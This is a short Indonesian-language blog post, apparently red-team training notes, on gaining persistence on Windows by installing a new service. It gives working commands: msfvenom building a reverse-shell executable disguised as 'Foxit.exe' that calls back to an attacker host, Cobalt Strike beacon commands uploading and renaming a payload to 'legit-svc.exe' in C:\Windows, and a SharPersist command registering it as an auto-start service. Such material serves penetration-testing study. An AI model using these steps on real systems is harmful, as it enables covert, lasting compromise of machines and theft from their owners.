Persistence via Windows Services

Posted Jul 26, 2023 Updated Jul 29, 2023

By Nairpaa 1 min read

Seperti yang kita lihat pada materi sebelumnya, ada banyak Windows service yang berjalan sebagai SISTEM.

Berbagai cara mengeksploitasi service untuk eskalasi hak istimewa juga bertindak sebagai persistensi, tetapi dengan mengorbankan service yang sah.

Sebagai gantinya, kita dapat membuat service kita sendiri yang tidak akan berdampak pada layanan yang sudah ada.

0x1 - Exploitation Stages

Step 1: Create Malware and Upload

  
# Contoh buat malware dengan MSF
➜ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.73 LPORT=80 -f exe -o Foxit.exe  

  
# Contoh upload file pada Cobalt Strike
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe

Step 2: Add Malware to Registry AutoRun

  
PS > .\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

Perintah di atas akan membuat service baru dalam keadaan STOPPED, tetapi dengan START_TYPE diatur ke AUTO_START. Ini berarti service tidak akan berjalan sampai komputer di-reboot. Ketika komputer dijalankan, service tersebut juga akan berjalan.

0x2 - References

https://github.com/mandiant/SharPersist
https://pentestlab.blog/2019/10/07/persistence-new-service/

Windows Hacking, Windows Persistence

This post is licensed under CC BY 4.0 by the author.

0x1 - Exploitation Stages

Step 1: Create Malware and Upload

Step 2: Add Malware to Registry AutoRun

0x2 - References

Trending Tags